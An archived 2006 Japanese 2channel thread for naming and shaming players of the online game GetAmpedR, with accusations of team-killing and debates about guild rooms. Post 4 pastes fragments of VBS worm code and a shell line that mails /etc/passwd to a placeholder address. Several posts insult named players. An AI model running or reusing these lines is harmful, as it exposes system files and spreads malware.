5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

▽:GetAmpedR 晒し12スレ目

1 :ポチFC ◆XksB4AwhxU :2006/12/22(金) 17:10:11 ID:/cU5IN+k
現在オープンβ中オンラインアクションゲームのGetAmpedR晒しスレです。

公式
ttp://www.getamped.jp/

本スレ
http://game10.2ch.net/test/read.cgi/netgame/1162601284/l50

前スレ GetAmped 晒し9スレ目
http://ex9.2ch.net/test/read.cgi/net/1160754256/l50


私怨、証拠のない晒しはスルーしましょう。
罪状、名前をしっかりと明記した上で晒してください。

荒らし、煽りはスルーしてまた〜りヲチしていきましょう、次スレは>>960が作る事(970が無理なら980で)
たまに晒されてしまった人可哀想な基地外が光臨しますがその場合はスルーしてください。

2 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 17:11:11 ID:rz5xH02k
糞スレ立てんな

3 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 18:21:53 ID:mg2KD3H8
>>1
見えない

4 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 20:38:43 ID:mwL51ybg
>>1
見えないんだが・・・。


c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 (1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"


5 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 20:41:02 ID:Qs0x2pGX
あれ、>>1が見えねー

6 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 20:50:39 ID:2nZhbcCz
http://www.uploda.org/uporg626325.jpg
呼んだ?

7 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 20:54:43 ID:zci62A3Z
クソロアの時代は終わって
これからはロイクスの時代だな!

8 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 20:57:13 ID:tg8vwWem
だから全スレ違うって・・・
あ、ネタですか

9 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 20:57:42 ID:254mNH9g
1回そのロイクスと会ってみたいんだがな・・・。
毎日やってるのに会えない。
強いのかい?
お暇な人はロイクスの「レビュー」とか作ってくれたらウレシス。

10 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 21:12:56 ID:3ygBKimW
誰か晒しスレ建て直しよろ。
俺はこのホスト(ryって出て建てられない。

11 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 21:18:37 ID:eBbN1MG8
なんで立て直す必要がある?

12 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 22:07:10 ID:tg8vwWem
そんなことも分からないのか?
ヒント:>>1

13 :名無しさん@ゴーゴーゴーゴー!:2006/12/22(金) 22:18:38 ID:eBbN1MG8
私怨でわざわざ重複させる必要あるの?
スルーでいいじゃん



14 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 01:58:33 ID:kdxbeqyw
冬ですね

15 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 02:05:16 ID:fzQ4AAF3
冬休みはじまったな!

16 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 05:00:26 ID:kdxbeqyw
>>9
では1個人からの感想

ロイクス
罪状:会えば分かる
晒しで出るのは暴言や詐欺等が多いが、こいつは一味違う
こいつが何か喋った時・・・・それは同時に、夏厨冬厨を連想させる。
真性基地害 と言う言葉が、これほど似合う者はいないだろう

暴言などは「少ない」が、明らかに痛い子な発言「しか」しない
誤字脱字・平仮名多用な所を見て、消防だろう。

実力は糞以下。あいつに負けるなら引退を考えたほうがいい
オール船で、様々なアクセを禁止にするのも勝てないのが理由だ。

例(というか体験談)
ロイクス船で落とされる。
ロ「わざとだ」
ロ「べー」(多分あっかんベーと思)
勿論TDなのでロイクスがいるほう負け。
ロ「ちゃんとやれ」



17 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 07:04:04 ID:fdn4qRgv
クロロアも相当な屑だったが
それ以上なのかロイ糞ってのは

18 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 08:01:05 ID:ZcVYkfTg
小中学なんだろ。察してやれ。

それより糞迷惑なポチFCの方が邪魔。

19 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 11:28:23 ID:dt946Bld
TK野郎より全然マシ

20 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 11:46:52 ID:DJ5h+Rg8
クロロアは工房だが中身は厨房。
ロイクスは消防で消防。

21 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 13:27:19 ID:L5UzSO+i
てか、どいつもこいつもなんで船でしかやらないんだ?
シティーとかでも面白いってのに・・

22 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 13:52:59 ID:wsuOXmA0
ゴリが出るから
ロボに乗れるから
落としやすいから
海賊王にオレはなる


23 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 14:06:10 ID:tUlQd6FM
TKと言えばチリスだな。まぁたいして強くないが(笑)
ただ警戒を解いた時にいつもTKされる。俺も落ちたもんだ(ノ∀`)

24 :【どうせ2ちゃんねる】:2006/12/23(土) 14:22:03 ID:1Ov/YcqK
1 :ひろゆき ◆3SHRUNYAXA @どうやら管直人 ★:2006/12/22(金) 10:30:16 ID:fhNmrpyQ
そんなわけで、クリスマス占い機能をつけてみました。。。
名前欄に【天地川海岸山崎渉航谷気岩】と書き込めば
【2ちゃんで実況】とか【ふて寝】とか記録が出ます。それがクリスマスイヴの貴方の行動を表しますです。。
意見が割れた時の漢気判定に使ったり、お暇なら遊んでください。。。


25 :【天地川海岸 asf-cable.c-able.ne.jp航谷気岩】:2006/12/23(土) 14:46:01 ID:L5UzSO+i
落とし狙いの人にとっては好都合なステージってわけか・・

26 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 14:46:43 ID:L5UzSO+i
ぎゃふん、身元が割れちまったぜ
まぁいっか(´・ω・`)

27 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 14:48:59 ID:ukmQYKg4
プッ・・・・・

28 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 14:52:45 ID:6sJM17dh
>>4
ウィルス配布すんなヴォケ

29 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 14:55:20 ID:kdxbeqyw
TKと言えばシスカだと思ってしまった俺はどうすれば

30 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 15:50:10 ID:wu4YdO7c
厨ギルド

REAL
いもむし
ザ・ゲリラ
インペリアル
キャラクターズ
nightmare

こんな感じか

31 :ポチFC ◆XksB4AwhxU :2006/12/23(土) 16:26:45 ID:O5R7LsVE
>>23
落ちたも何も一回もあがってもないんじゃない?
sageもしてないし^w^

32 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 16:42:40 ID:ukmQYKg4
えびたろうは大卒ときいたが

33 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 16:54:34 ID:wsuOXmA0
大卒でも厨は厨


34 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 17:05:05 ID:6+apbeYP
あー俺は毎日冬休み

35 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 17:15:38 ID:ntd+8aob
>>32
今年度で修士も終わりらしいぞ

36 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 18:28:02 ID:9ehFPv9D
>>26
山口のケーブルTVかよ

37 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 18:57:42 ID:HodhZ/hM
http://up.kabubu.net/cgi/img/14582.png


38 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 19:15:35 ID:ukmQYKg4
>>37
この条件で4:3とは酷い

39 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 21:29:10 ID:yyWIZIlr
>>37
名前隠すなら、ギルドアイコンも隠してやれよ…


40 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 21:30:46 ID:ukmQYKg4
名前隠してる意味がまるっきりないなww

41 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 21:35:35 ID:9ehFPv9D
頭隠して尻隠さず

42 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 21:55:13 ID:S6dWoKqN
サバで組む奴ってなんなの
ハンナとジョギングお互いに攻撃しないようにしてるんだが

43 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 22:26:38 ID:zHyYxz3C
組んでるやつは粘着して倒せ

44 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 22:29:11 ID:R0V2aMDq
ロイクスいじめるの楽しいよ^^

45 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 22:29:56 ID:fzQ4AAF3
クソロアの時代は終わって
これからはロイクスの時代だな!

46 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 23:05:07 ID:4JPEdOu7
本スレが見れないのは俺だけ?

47 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 23:17:46 ID:kdxbeqyw
>>42
組みに粘着で対応して文句言われたら
「お前モナー」言っとけ

48 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 23:28:48 ID:Yxfgu6B7


49 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 23:52:13 ID:kdxbeqyw
今日のロイクス
登録文がかなりの俺様
即自滅→「意味わからん」
相手の登録文に過剰反応

50 :名無しさん@ゴーゴーゴーゴー!:2006/12/23(土) 23:55:11 ID:MKlT8J3T
俺もしかして大人気?
http://www.uploda.org/uporg627941.jpg


51 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 01:13:35 ID:6UDJG+vT
>>42
ジョギングって奴はガチでリア厨だから仕方ない部分もあるが
サバ当初から勝てないから勝つためには組むのが早いと考えてしまったみたいで
サバで会った人にひたすら話す、気の会う厨房が合意
そんな感じのネットワークんあである意味GARを楽しんでるんだろうから優しく粘着して殺しとけばおk

52 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 01:42:38 ID:TfpS2JH/
ロイクス部屋初めて観戦したが面白すぎるwww
なにあのTK部屋

53 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 04:11:08 ID:Ep50fN4m
                 ′  ,イ
                 //l//                   . -−―‐ 、
  /   |  ┼          /              .  ´。゚。゚/ ̄ ̄ヽ 丶、
  \   l  d‐  ロ        /              ∠_`i〃 // ̄`ヽ 」   ヽ.
            イ         7_           ., ' ニミi」{{∠∠ニ二 _    li |i '.
   _l,. ┐┼┴、  ク        /        / . -  ,. -――‐ 、`ヽ  |l lj  i
.   /|  l/ |  ‐'  ス       /        /´ __/ ____    ヽ   lj  - 、!
.           |       /        //´  _/      `ヽ _|   / , -、ヽ
   |   /   |       i-<⌒ヽ、   / { ー{            }_|    /⌒ヽ i
   |   \         l/`ヽ.__}   i |\ ‐ヽ  ,. --、  , ---、| |i  { - 、  l
   |    __l__        .> ,ハ   ! ',  `ー ' /.::::::::::し' .::::::::::| u   ) l |
   |   -ゝ-       { /   〉  .', ',    {::::::::::::::::__::::::::}  r‐、__ノ
   |  (´__        .ゝ  /}   . ',   /⌒i, 一ァ'´   /⌒/   ヽ._/
       ‐一ァ       {     , ′   ′ V⌒l/  ′ /⌒ ′  /
.   ̄ ̄)   /          ゝ /        ヽ ヽ `ー‐一'´  /    ′
     ´    {_         {‐'´  , -― 、  \` ̄ ̄ ̄ ̄´     |     /
  ////              \-‐/: : : : : : : \_ 丶、___ -‐''´   ヾフ´ン': : /
  ・・・・               __V: : : : : : : : / : : :\_/      /    // : / :
                /!: : : :/ : : : : : : /: / ̄ ̄{    ∠ -‐ァ'´: : : : : : : : :
               /  l : : 〈 : / . : : : : :/  ̄ ̄ ̄ヽ_/   /: : : : : : : : : : :
/|/ ̄|/ ̄ ̄`Y´    |: : : :∨ : : : : : : : \           /: : : : : : : : : : : : :


54 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 08:09:00 ID:yraOfliU
誰か晒し専用うpろだ作ってくれ

55 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 10:51:40 ID:zYbzLENa
すけ平

現在、初心者サーバーで初心者狩り

56 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 12:32:21 ID:BXyAhzRw
2ch見るほどの輩がビギナーにいるってことは
お前も初心者狩りしてんじゃねーの^^;

57 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 12:33:23 ID:aXzerhJE
これはひどい偏見

58 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 13:08:41 ID:csHszC1v
ディープ→ダイワメジャー→ドリパスの3連複20万買った

59 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 13:18:53 ID:y1scd/GC
>>55
おまいも初心者狩りしてたのか!最低だな

60 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 14:37:18 ID:zLIXaAl/
2chにいる=強いと思ってるのか

スキンが上手い=強い とか思ってそうだな

61 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 14:59:37 ID:N2N8V9jc
LoveAngel

形勢が悪くなると落ち逃げ。
チームに回線落ちした仲間を先に殺し「じゃまだ」の一言。

62 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 15:57:51 ID:MVrSxBEt
どっちかっていうと、スキンが上手い=弱い
な感じなイメージが昔はあったけどな。

63 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 16:44:15 ID:0htlgk7Z
メリークリスマス!
http://tkfiles.storage.msn.com/x1piYkpqHC_35lIjIcSOpmSs5OSwQTEeaIPczbmGWee4gMtIJMdcyyriLgvPh4WbpBf57EePLf8Mdsd4LfMLZ8Uqh1YleNNn2ogtfHma35YGvQ1JE4HWEpPeg
http://tkfiles.storage.msn.com/x1piYkpqHC_35lIjIcSOpmSs5UlM1B9wKeUcLNFKi1mcmxEXr62JgwBSyynyImH4wOLfDab_elmZVxizZVDbETFrnYZ4g62mXbmPxWCMWIerY-dkfN4-zTF1g

64 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 17:21:57 ID:lguYqJAP
こんなやつらばっかりなのかGA・・・
オフなんていけませんな!\(^0^)/

65 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 17:41:18 ID:eE4+6bNw
俺よりマシ

66 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 17:55:22 ID:tuaAF19G
>>63
いつの写真だよwwwww

67 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 18:11:47 ID:csHszC1v
ぴかちうがいるな

68 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 18:43:11 ID:gHXIqDWc
このぴかちうってもしかしてあのべるべーるのひと?

69 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 18:44:49 ID:zLIXaAl/
>>68
この状況では妄想乙 としか言えまい

70 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 18:58:16 ID:8lsgpj0O
てかなんでこいつらがGAのプレイヤーってわかるんだ?


71 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 19:06:33 ID:wYMqYKZs
>>70
アミーゴの集合写真
ttp://www.getamped.jp/gallery/event/cb/event061219.html
>>63の写真をよく見比べてみよう。

72 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 19:09:03 ID:HQxQvQ6U
>>70
ヒント
Ezオフ会

73 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 19:16:29 ID:ivuyVbAj
>>54
うpろだなら、そこら辺に腐る程あるだろ?

74 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 20:24:41 ID:PTYuhc/1
あの写真知ってる奴mixerだよな?w俺もだけど

75 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 20:37:55 ID:WFst04Gu
ほとんどの古参ってmixiで繋がってるの?

76 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 22:58:37 ID:R3cNlYWR
http://www.uploda.org/uporg629435.jpg
ロイクス、チェリーボーイらしいぜ

77 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 23:03:00 ID:EtPiliz9
>>74
GAオフ参加した奴のブログで晒してたぞ


78 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 23:03:25 ID:2rHEq9Wq
ロビーで厨がお祭り騒ぎですね

79 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 23:04:02 ID:Cui184V6
ロイクスがGMに警告受けてるwwwww

80 :名無しさん@ゴーゴーゴーゴー!:2006/12/24(日) 23:58:25 ID:lta3e0FZ
そのうちマジで訴えられるぞ
うん百万円払う事になったら親にも迷惑かかるし一生指差されて生きていくことになる

81 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 00:08:43 ID:ifF5fsRe
ベルベールきめぇww

82 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 00:19:18 ID:ltgEpzEJ
サバの厨房がうざすぎる

83 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 00:48:25 ID:mEKGnAhW
                 ′  ,イ
                 //l//                   . -−―‐ 、
  /   |  ┼          /              .  ´。゚。゚/ ̄ ̄ヽ 丶、
  \   l  d‐  ロ        /              ∠_`i〃 // ̄`ヽ 」   ヽ.
            イ         7_           ., ' ニミi」{{∠∠ニ二 _    li |i '.
   _l,. ┐┼┴、  ク        /        / . -  ,. -――‐ 、`ヽ  |l lj  i
.   /|  l/ |  ‐'  ス       /        /´ __/ ____    ヽ   lj  - 、!
.           |       /        //´  _/      `ヽ _|   / , -、ヽ
   |   /   |       i-<⌒ヽ、   / { ー{            }_|    /⌒ヽ i
   |   \         l/`ヽ.__}   i |\ ‐ヽ  ,. --、  , ---、| |i  { - 、  l
   |    __l__        .> ,ハ   ! ',  `ー ' /.::::::::::し' .::::::::::| u   ) l |
   |   -ゝ-       { /   〉  .', ',    {::::::::::::::::__::::::::}  r‐、__ノ
   |  (´__        .ゝ  /}   . ',   /⌒i, 一ァ'´   /⌒/   ヽ._/
       ‐一ァ       {     , ′   ′ V⌒l/  ′ /⌒ ′  /
.   ̄ ̄)   /          ゝ /        ヽ ヽ `ー‐一'´  /    ′
     ´    {_         {‐'´  , -― 、  \` ̄ ̄ ̄ ̄´     |     /
  ////              \-‐/: : : : : : : \_ 丶、___ -‐''´   ヾフ´ン': : /
  ・・・・               __V: : : : : : : : / : : :\_/      /    // : / :
                /!: : : :/ : : : : : : /: / ̄ ̄{    ∠ -‐ァ'´: : : : : : : : :
               /  l : : 〈 : / . : : : : :/  ̄ ̄ ̄ヽ_/   /: : : : : : : : : : :
/|/ ̄|/ ̄ ̄`Y´    |: : : :∨ : : : : : : : \           /: : : : : : : : : :

84 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 02:23:59 ID:gZ3EH09p
ねあっsね、じゃあみんなおやすい

85 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 04:07:37 ID:GXm4bbm2
本スレ書きこめねぇや

86 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 04:41:33 ID:FVeKHZMb
>>78-79
具体的に何をやったか詳しく!
>>80が危惧するほどの事をやったのか?

87 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 14:40:43 ID:MxB7s5ik
おりゃあああああああああああああああああああああ

88 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 22:30:51 ID:PDKBWy3n
こいつホーケらしいぜw

http://www.uploda.org/uporg630668.jpg

89 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 22:45:20 ID:wYhtrTyU
ロイクス降臨
http://www.uploda.org/uporg630698.jpg

90 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 23:21:41 ID:tqSm1+Ll
ttp://www.imgup.org/iup306327.png


りぃな ってあの2nd荒らしの双牙だっけ?
今さっきもTKしまくってたな。

91 :名無しさん@ゴーゴーゴーゴー!:2006/12/25(月) 23:46:56 ID:cHcdRHhr
>>89
不覚にもワラタ

92 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 00:46:21 ID:b+HwP5UD
>>90
お前俺に殺された奴だろww
TKだってして無いし、荒らしたりもしてないよwww

93 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 03:54:34 ID:n0Rr3mM6
2nd荒らしが何言っても説得力が無いのは確か。

94 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 05:19:39 ID:b+HwP5UD
>>93
それはお前もだろ?ww
名無しが何を言っても説得力が無いwww

95 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 06:00:10 ID:0WpryN3x
TKするわ、草生やすわ、元祖サブ垢荒らしだわ。
俗に古参と呼ばれる屑共はロクなのおらんな。

96 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 06:35:48 ID:MkX5MSoS
新参にまともな腕のも居ないけどな

97 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 11:47:02 ID:NJSZ6WwT
双牙って厨房だろなんでmixi登録してるんだよ、ポチFCと同じレベルじゃねーか

98 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 12:19:01 ID:Umkg8JzF
ビギナー
TK厨
死ね

99 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 12:37:42 ID:12E+kQ4K
>>96
新参なんだから当たり前だろ

100 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 14:57:33 ID:7sdGtbBn
ビギナーと共闘したが、一切TK無かった件

一応言っとくが、「激しい誤爆」と「TK」は違うぞ

101 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 15:44:24 ID:12E+kQ4K
共闘と言うな、初心者狩りと言え

102 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 16:36:20 ID:7sdGtbBn
>>101
フリーのTDで一緒のチームだった なんだが

103 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 17:05:45 ID:bG+TOmIz
Near

リーダー気取りはいいが、
気に入らない奴、ミスした奴を攻撃している。

104 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 17:37:52 ID:0WpryN3x
>>103
そいつはWatch対象として、なかなか面白い奴だよな。

双牙程の屑さではないけど。

105 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 18:15:52 ID:KAhGKD2Z
くろい人ってTDで強いチームにしか行かなくね?

106 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 18:25:38 ID:l/2U5rhs
そういえばNearはハード30万の手伝いを頼んでくるが
自分の無力を棚に上げ 他人の失敗ばかり「・・・」
などと対応してくる。まぁ厨房だから相手にしちゃ
いかんのだろうが

107 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 18:28:51 ID:3Us5rp4i
>>106
厨房ならではだろうな。逆に可愛いよ。
んな事よりポチFC、双牙は迷惑。

108 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 20:14:25 ID:F8UaZkJy
http://www.uploda.org/uporg631808.jpg

ドラゴンBR、こいつがMASTERだと
有無を言わさず退室させられる。

悪いことは言わん、ドラゴンBRの部屋には入るな!

109 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 20:16:54 ID:dJ5F+O6r
キックしたぐらいで晒されるのか。恐ろしい時代になったもんだ。

110 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 20:35:31 ID:3Us5rp4i
ギルドvsギルドなら分かるが、ギルドvs客を立ててる奴って一体何なんだ?
有利な立場で勝ちたいだけ?
Ezってのも今現在そういう部屋立ててるな。

111 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 20:42:36 ID:bG+TOmIz
そういう考え方もあるが
他にも理由はいっぱいある

知り合い同士でやりたい
コンビネーションほしい
誤爆してもいっか
身内でこそこそ喋れる

別に俺はEzじゃないけどギル部屋やったりするから

112 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 21:03:59 ID:oyvB3AKX
つまり雑魚とは組みたくない=ギルドの強い奴同士で組みたいってことでしょ

113 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 21:05:44 ID:4RSbrrtq
相手のギルド見つけるの面倒だからだろ。
あと>>111>>110の言うことを理解していないように見える。

114 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 22:24:15 ID:1AcIK4w6
ギルドvs客を建てるぐらいしかギルドとしてやる事なさそうだな。

なんかGAにギルドなんていらない気がしてきた。

115 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 22:35:51 ID:PmWCQeLI
じゃあ俺が「GARの愉快な仲間たち」って作るからお前らはいってくれ

116 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 22:40:45 ID:cXR/kVcT
EZなんてメンバーの人数多いんだから身内で鍵に篭って馴れ合いしてりゃいいんだよ。

他と戦いたきゃ野良でやれよ。

それなのに、ギルドvs客でやるってことは、狩り部屋ってことだ。
所詮、EZも戦績厨と同じってことだな。

ようするにEZは戦績&チキン厨だってことでFA

117 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 23:11:41 ID:S56zFLf2
>>116
人はかがみ

118 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 23:16:07 ID:wbmVONg9
気の合う仲間とギルドを作る
そしてギルドvs客を建てただけで晒される
酷い世の中になりましたね

119 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 23:41:26 ID:dJ5F+O6r
>>118
ギルドvs客は客側が十中八九不利だからな。
それをわかってて入るんだろ?
と言っても全員が全員わかっているわけではないし、晒されても仕方がない気がする。

諸悪の根源はギルドvsギルドをしやすい環境を作らないCSなんだけどな。

120 :名無しさん@ゴーゴーゴーゴー!:2006/12/26(火) 23:54:15 ID:sbEnExJR
オナニー

121 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 00:00:25 ID:wKpVTXdG
ギルドvsギルドってかプロ鯖が流行すれば良いだけ
といっても既に27万Pで実力者とは言えないが・・・

122 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 00:06:55 ID:NjpQeOy/
>>116
Ezなんぞに全く私怨は無いが、ギルドvs部屋がウザいってだけ。

123 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 00:36:48 ID:xHDj/i6U
まぁ、このスレはEZがかなりいるから身内乙とでもいっておこう








身内乙

124 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 01:12:38 ID:V2EJ14D6
https://www.getamped.jp/bbs/view.php?id=skin&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=800
これはひどい

125 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 09:00:44 ID:/1uNf8RH
ギルド部屋が嫌なら入らなければいいのに。
人がこなけりゃ勝手に潰れるだろ。
状況わからず入るなんてよっぽどの初心者ぐらいでしょ。
そんな人は気の毒だとは思うけどさ。

126 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 09:07:38 ID:4nBJGDp/
>>106
人に頼ってるだけだよな

127 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 11:40:16 ID:WSMS3gYZ
改めて考えると
ギルドvs客が何でウザいのか分からない俺。

単純に、○○ギルドと戦える。わ〜い でよくね

128 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 11:46:08 ID:/1uNf8RH
入りたいギルドとかがギルドVS開いてたら
何度か挑戦しに行って顔見知りに
なるチャンスだと思うな。

129 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 12:09:46 ID:79AVTTq/
>>127
何も知らずに入っていった初心者が辞めていく。俺の知り合いもそれで辞めた。
部屋が少ないとき(総数3・4ぐらい)にギルドvs客が作られていると阿呆かと思う。
部屋内で談話が始まってなかなか試合開始にならない。

130 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 12:30:07 ID:/1uNf8RH
>>129
ビギナー鯖で立ててる訳じゃないんだから
入る方が迂闊な気もする。部屋名から馬鹿じゃない限り
不利ってのは分かるんだし。
部屋数少ないってんなら自分で立てればいいじゃない。
談話は確かにウザイ。

ギルドVS部屋は確かに挙って立てるもんじゃないとは思うけど
別にあってもいいんじゃないかと。

131 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 12:45:19 ID:79AVTTq/
>>129
ビギナー鯖も閑古鳥が鳴いている状態だし、
初心者がギルドvs客に入ってきて玉砕されているのは事実。

ギルドvs客の場合、ギルド側が誰か欠けると終了になるパターンが多いから、
部屋数少ないときはギルドvs客立てるより他の部屋立てた方が利点が多い。
これはギルドvs客に限ることじゃないけどね。

俺もギルドvs客はあってもいいと思うけど、もう少し色々配慮をしてほしいと思う。

132 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 13:31:04 ID:WSMS3gYZ
じゃああれだ、ギルドvsって、大体3対3だろ

ギルド側が1人初心者入れればよくね。

133 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 15:06:09 ID:2PRY/5Bb
いやあれだろ、その初心者がセイントとかつけたらいいんじゃね

134 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 15:18:36 ID:itsYjlsH
バカ初心者がセイント装備したらD弱かD強で落下死しちゃうだろ!

135 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 15:24:21 ID:2PRY/5Bb
じゃあブレストとかフェニックスでどうだい!

136 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 15:42:55 ID:/1uNf8RH
ギルドVSやってる奴らは
変なプライドがあるか知らないけど
えげつないアクセをあまり付けてこないから
こっちはセイントやブレストなどで
完全武装して挑めばいいと思うよ。
それで文句言ってくるギルドだったら晒そうぜ
